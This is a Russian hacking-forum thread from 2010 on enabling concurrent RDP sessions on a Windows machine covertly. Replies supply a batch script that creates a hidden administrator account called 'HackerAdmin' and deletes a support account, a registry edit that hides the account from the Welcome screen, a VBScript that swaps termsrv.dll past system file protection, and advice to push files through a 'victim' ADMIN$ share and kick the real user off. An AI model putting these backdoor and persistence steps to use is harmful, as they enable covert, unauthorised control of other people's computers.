ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Включение rdp
  #1  
Старый 23.01.2010, 13:44
OPF_Nik
Познающий
Регистрация: 07.11.2009
Сообщений: 36
Провел на форуме:
77411

Репутация: 0
Отправить сообщение для OPF_Nik с помощью ICQ
По умолчанию Включение rdp

Народ, вот у меня такая проблема:
Прописал параметр в реестр, что бы включить возможность подключения через rdp, но при входе, пишет, мол одна учетная запись уже работает
Как можно это изменить, и желательно без палевно?
 
Ответить с цитированием

  #2  
Старый 28.01.2010, 02:16
Monsieur
Новичок
Регистрация: 17.01.2010
Сообщений: 4
Провел на форуме:
15042

Репутация: 5
Smile

Хм,насчет беспалевности затрудняюсь ответить. Возможен такой вариант(я так через телнет иногда подключаюсь). Сразу скажу,что это самый палевный вариант из все возможных
Пишешь батник:
Код:
chcp 1251
net user SUPPORT_388945a0 /delete
net user HackerAdmin mygoodpassword /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
(SUPPORT_388945a0 для xp prof и 2003сервер)
т.е. добавляешь нового пользователя с админскими правами и удаляешь первоначального.

Но т.к. при создании нового администратора, он будет виден в Вэлком Скрине, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.reg
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows 
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"HackerAdmin"=dword:00000000
Безусловно,это не весь батник,а лишь его основа.
 
Ответить с цитированием

  #3  
Старый 01.02.2010, 22:51
OPF_Nik
Познающий
Регистрация: 07.11.2009
Сообщений: 36
Провел на форуме:
77411

Репутация: 0
Отправить сообщение для OPF_Nik с помощью ICQ
По умолчанию

это я и так знаю)) но спасибо за помощ
 
Ответить с цитированием

  #4  
Старый 02.02.2010, 16:24
TheBloodTear
Новичок
Регистрация: 22.01.2008
Сообщений: 3
Провел на форуме:
4261

Репутация: 0
По умолчанию

Цитата:
Сообщение от OPF_Nik  
это я и так знаю)) но спасибо за помощ
У тебя есть возможность подойти к ПК локально?..

Если есть, и на нем установлена OC Windows XP, то делай так, ну а потом извращайся.. Если честно, то не пробовал такой способ сам..
Я заменял библиотеку termsrv на самую раннюю, она еще с беты(если не ошибаюсь)..
Если этот способ не поможет, то отпишись, опишу другой..
 
Ответить с цитированием

  #5  
Старый 02.02.2010, 22:56
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от TheBloodTear  
У тебя есть возможность подойти к ПК локально?..

Если есть, и на нем установлена OC Windows XP, то делай так, ну а потом извращайся.. Если честно, то не пробовал такой способ сам..
Я заменял библиотеку termsrv на самую раннюю, она еще с беты(если не ошибаюсь)..
Если этот способ не поможет, то отпишись, опишу другой..
хм. ну напиши другой.
 
Ответить с цитированием

  #6  
Старый 03.02.2010, 14:03
TheBloodTear
Новичок
Регистрация: 22.01.2008
Сообщений: 3
Провел на форуме:
4261

Репутация: 0
По умолчанию

Цитата:
Сообщение от p.r0phe.t  
хм. ну напиши другой.
Для этого сначала надо будет скачать вот эту библиотеку..

Потом проделать это:
1) Создай такие ключи:

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server\Licensing Core\EnableConcurrentSessions", "00000001", "REG_DWORD"

"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Wi ndows NT\Terminal Services\MaxInstanceCount", "00000003", "REG_DWORD"

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions ", "00000001", "REG_DWORD"

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LogonType", "00000001", "REG_DWORD"

2) Замени системную библиотеку на скачанную (только замена руками очень затруднительна, т.к. система хорошо следит за целостностью, я использую vbs-скрипты или подобное):

system_folder = "c:\windows\system32\"
system_cache = "c:\windows\system32\dllcache\"
new_dll = "termsrv.dll"
cache_dll = "C:\windows\system32\dllcache\termsrv.dll"
old_dll = "C:\windows\system32\termsrv.dll"
old_name = "termsrv_old.dll"

fso.MoveFile cache_dll, system_cache & old_name
fso.CopyFile new_dll, system_cache, true
fso.MoveFile old_dll, system_folder & old_name
fso.CopyFile new_dll, system_folder, true

3) Система ругнется на то, что целостность улетела в аут, и предложит восстановить все, жмите не надо, перезагрузитесь, и пробуйте..

Отпишитесь, заработает или нет.. Если нет, попробую сделать exe-шник для всех этих махинаций..

Последний раз редактировалось TheBloodTear; 03.02.2010 в 15:29..
 
Ответить с цитированием

  #7  
Старый 03.02.2010, 22:42
OPF_Nik
Познающий
Регистрация: 07.11.2009
Сообщений: 36
Провел на форуме:
77411

Репутация: 0
Отправить сообщение для OPF_Nik с помощью ICQ
По умолчанию

TheBloodTear надо будет попробывать, спс
Но вообще, доступ удаленый
 
Ответить с цитированием

  #8  
Старый 03.02.2010, 23:35
TheBloodTear
Новичок
Регистрация: 22.01.2008
Сообщений: 3
Провел на форуме:
4261

Репутация: 0
По умолчанию

Цитата:
Сообщение от OPF_Nik  
Но вообще, доступ удаленый
Ну как я понимаю пасс админа ты знаешь, так что копируй по этому пути:
\\жертва\ADMIN$ ..

Единственная проблема это защитник системный файлов, он ругнется в консольный сеанс, но я думаю потом выложу чтонить против него..

Ну а если RDP по инету, то просто разок подчикирь человека и выбей, а потом глумись..
 
Ответить с цитированием

  #9  
Старый 04.02.2010, 20:31
cheater_man
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
Провел на форуме:
709575

Репутация: 17
По умолчанию

Цитата:
Сообщение от OPF_Nik  
Народ, вот у меня такая проблема:
Прописал параметр в реестр, что бы включить возможность подключения через rdp, но при входе, пишет, мол одна учетная запись уже работает
Как можно это изменить, и желательно без палевно?
Придется заменить родную termsrv.dll или пропатчить её. Почитай вот это
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
RDP и sam DeepXhadow Уязвимости 7 12.05.2009 21:08
Sniffer for rdp b05h Soft - Windows 0 08.03.2009 22:44
Проблема с rdp в windows server 2003 elimS2 Windows системы 2 22.01.2009 15:47
Звук через RDP podkashey Windows системы 9 13.01.2009 04:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ